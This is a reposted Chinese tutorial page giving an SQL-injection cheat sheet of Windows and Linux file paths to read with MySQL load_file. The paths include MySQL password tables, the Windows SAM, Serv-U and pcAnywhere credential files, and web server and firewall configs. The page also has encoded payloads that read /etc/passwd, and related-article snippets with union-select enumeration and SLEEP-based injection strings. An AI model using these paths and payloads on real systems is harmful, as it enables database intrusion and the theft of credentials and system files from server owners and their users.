首页 / MYSQL / MySQL注入load_file常用路径

MySQL注入load_file常用路径

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了MySQL注入load_file常用路径，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含2260字，纯文字阅读大概需要4分钟。

内容图文

WINDOWS下:

c:/boot.ini //查看系统版本

c:/windows/php.ini //php配置信息

c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码

c:/winnt/php.ini

c:/winnt/my.ini

c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码

c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码

c:\Program Files\Serv-U\ServUDaemon.ini

c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置

c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码

c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此

c:\Program Files\RhinoSoft.com\ServUDaemon.exe

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件

//存储了pcAnywhere的登陆密码

c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf //查看WINDOWS系统apache文件

c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.

c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

d:\APACHE\Apache2\conf\httpd.conf

C:\Program Files\mysql\my.ini

C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX 下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件

/usr/local/apache2/conf/httpd.conf

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/usr/local/app/php5/lib/php.ini //PHP相关设置

/etc/sysconfig/iptables //从中得到防火墙规则策略

/etc/httpd/conf/httpd.conf // apache配置文件

/etc/rsyncd.conf //同步程序配置文件

/etc/my.cnf //mysql的配置文件

/etc/redhat-release //系统版本

/etc/issue

/etc/issue.net

/usr/local/app/php5/lib/php.ini //PHP相关设置

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

原文：http://www.cnblogs.com/lcamry/p/5729087.html

内容总结

以上是互联网集市为您收集整理的MySQL注入load_file常用路径全部内容，希望文章能够帮你解决MySQL注入load_file常用路径所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/1097815.html

来源：【匿名】

【上一篇】ibatis SQLmap mysql模糊查询字符串拼的三种方法【下一篇】用IE远程创建Mysql数据库的简易程序

更多 ►

【MySQL注入load_file常用路径】教程文章相关的互联网学习教程文章

Mysql注入+IIS7.5解析实战【图】

本文仅为了学习交流，严禁非法使用！！！ (随笔仅为平时的学习记录，若有错误请大佬指出)(先复现一个解析漏洞和Msbuild.exe绕过某防护软件，为后面的实战做个铺垫,以下都是基本操作，大佬不要喷)1.IIS7.5解析漏洞复现先复现IIS7.5解析漏洞(搭建环境的时候忘记截图了，只截了部分入坑图，大佬博客有详细的复现步骤 https://blog.csdn.net/qq_41703976/article/details/103844644) 入坑部分(笔者搭建环境是win2008，采用的php-cgi.ex...

mysql防SQL注入搜集【代码】

SQL注入例：脚本逻辑$sql = “SELECT * FROM user WHERE userid = $_GET[userid] “;案例1：SELECT * FROM t WHERE a LIKE ‘%xxx%’ OR (IF(NOW=SYSDATE(), SLEEP(5), 1)) OR b LIKE ‘1=1 ‘;　案例2：SELECT * FROM t WHERE a > 0 AND b IN(497 AND (SELECT * FROM (SELECT(SLEEP(20)))a) );　案例3：SELECT * FROM t WHERE a=1 and b in (1234 ,(SELECT (CASE WHEN (5=5) THEN SLEEP(5) ELSE 5*(SELECT 5 FROM INFORMATION_SCH...

MYSQL注入天书之数据库增删改介绍【图】

Background-4 增删改函数介绍在对数据进行处理上，我们经常用到的是增删查改。接下来我们讲解一下mysql 的增删改。查就是我们上述总用到的select，这里就介绍了。增加一行数据。Insert简单举例 insert into users values(‘16‘,‘lcamry‘,‘lcamry‘);?删除 ?2.删数据:?? delete?from?表名;?? delete?from?表名?where?id=1;?? ?删除结构：?? 删数据库：drop?database?数据库名;?? 删除表：drop?table?表名;?? 删除表中的列:al...

PyMySQL基本使用以及SQL注入问题【代码】【图】

目录PyMySQL基本使用以及SQL注入问题PyMySQL基本使用SQL注入问题数据的增删改查PyMySQL基本使用以及SQL注入问题PyMySQL基本使用又是一个可以帮助我们实现用代码来操作数据库的模块，安装，导入即可然后导入即可使用# pymysql基本使用 import pymysqlconn = pymysql.connect(user='root',password='123',host='127.0.0.1',port=3306,charset='utf8',database='db3' ) cursor = conn.cursor(cursor=pymysql.cursors.DictCursor) # 产...

11 May 18 子查询，IDE工具（navicat），pymysql模块（安装，查询，防sql注入，增删改）

11 May 18一、上节课复习select concat_ws(":",name,age,sex,post) as info from emp; # egon:male:18 二、子查询（一个问题一个问题解决）把一个查询语句用括号括起来，当做另外一条查询语句的条件去用，称为子查询 select name from emp where dep_id = (select id from dep where name="技术"); #子查询select emp.name from emp inner join dep on emp.dep_id = dep.id where dep.name="技术"; #链表 #查询平...

Mysql注入小tips --持续更新中【代码】【图】

学习Web安全好几年了，接触最多的是Sql注入，一直最不熟悉的也是Sql注入。OWASP中，Sql注入危害绝对是Top1。花了一点时间研究了下Mysql类型的注入。　　　　文章中的tips将会持续更新，先说说这些天研究的　　　　这里博主以数字类型注入类型进行讲解，字符类型同理，这里不在敖述。　　　　我们的环境:phpstudy+mysql+php　　　　　　我们的测试代码如下:<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...

05-navicat使用、查询练习、pymysql与sql注入【代码】

一、 Navicat软件""" 一开始学习python的时候下载python解释器然后直接在终端书写 pycharm能够更加方便快捷的帮助你书写python代码 excel word pdf我们在终端操作MySQL 也没有自动提示也无法保存等等不方便开发 Navicat内部封装了所有的操作数据库的命令用户在使用它的时候只需要鼠标点点即可完成操作无需书写sql语句 """ 安装直接百度搜索有破解版的也有非破解非破解的有试用期你如果不嫌麻烦你就用使用到期之后重新装再...

MySQL注入load_file常用路径

WINDOWS下:c:/boot.ini //查看系统版本c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码c:/winnt/php.inic:/winnt/my.inic:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码c:\Program Files\Serv-U\ServUDaemon.inic:\windows\system32\inetsrv\MetaBase.xml ...

MySQL-注释-Navicat基本使用-复杂查询练习题-解题思路-pymysql操作数据库-SQL注入-05【代码】【图】

目录mysql语句注释navicat 的基本使用特色（个人总结）与数据服务器建立连接创建&打开数据库、表创建打开修改操作表结构修改表结构查询修改操作表数据基本语句对应的操作模型 ***** 特色功能从数据库建立模型模型页面基本操作用模型设计数据库并导出结构、数据导入导出导出导入附属小功能刷新小按钮查看操作对应sql语句执行时间查看手动筛选数据练习数据准备使用SQL语句导入表结构与数据如何验证答案是否正确题目部分参考答案(只放...

MySQL防范SQL注入风险

MySQL防范SQL注入风险0、导读在MySQL里，如何识别并且避免发生SQL注入风险1、关于SQL注入互联网很危险，信息及数据安全很重要，SQL注入是最常见的入侵手段之一，其技术门槛低、成本低、收益大，颇受各层次的黑客们所青睐。一般来说，SQL注入的手法是利用各种机会将恶意SQL代码添加到程序参数中，并最终被服务器端执行，造成不良后果。例如，我们访问接口 http://imysql.com/user.php?userid=123 来根据userid获取用户信息，假设程序...

sql注入之——mysql的四大注入基本注入手法【图】

union类型的sql注入(联合查询注入)条件：页面必须有显示位判断列数： 1’ order by 3-- - 不存在返回错误判断显示位: -1’ union select 1,2,3-- - 查看数据库： -1’ union select user(),database(),version()-- - 查看数据库有哪些表 (爆数据表)table_schema=数据库名’ -1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3-- - 查看对应表有哪些列 ...

sql注入之mysql的联合查询爆破

）的结构以查询test数据库为例: 1.判断列数 union select 1,2,3,.......... 直到页面返回正常为止 2.判断当前数据库 union select database(),2,3,4,5 1的位置将会返回数据库的名字数据库名 database() 数据库版本 version() 数据库用户 user() 操作系统 @@version_compile_os 3.查询表名 union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=‘test‘ //group_concat()使...

深入了解SQL注入【图】

1 .什么是sql注入（Sql injection）？ Sql注入是一种将sql代码添加到输入参数中，传递到Sql服务器解析并执行的一种攻击手法 2. 怎么产生的？ Web开发人员无法保证所有的输入都已经过滤攻击者利用发送给Sql服务器的输入数据构造可执行的Sql代码数据库未做相应的安全配置 3.如何寻找sql漏洞？识别web应用中所有输入点了解哪些类型的请求会触发异常？（特殊字符”或）检测服务器响应中的异常 4. 如何进行SQL注入攻击？数字注入：...

SQL注入实战_MySQL

刚刚开始学习SQL注入入侵，有写的不对和不好的地方希望各位师哥，师姐们多多指导。在一个供求信息发布的网站上测试了一下，页面Http://www.xxx.com/new/new.ASP?id=49我做了如下测试：(1) Http://www.xxx.com/new/new.ASP?id=49Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误在查询表达式 ID=49 中。 /new.ASP，行36(2) Http://www.xxx.com/new/new.ASP?i...

mysql sql注入

防止SQL注入，我们需要注意以下几个要点：1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和双"-"进行转换等。 2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。 3.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。 4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。 5.应用的异常信息应该给出尽可...

首页 / MYSQL / MySQL注入load_file常用路径

MySQL注入load_file常用路径

内容导读

内容图文

WINDOWS下:

LUNIX/UNIX 下:

内容总结

内容备注

内容手机端

【MySQL注入load_file常用路径】教程文章相关的互联网学习教程文章

SQL注入 - 相关标签

MYSQL - 技术教程分类

MYSQL - 最新教程

MYSQL - 最热教程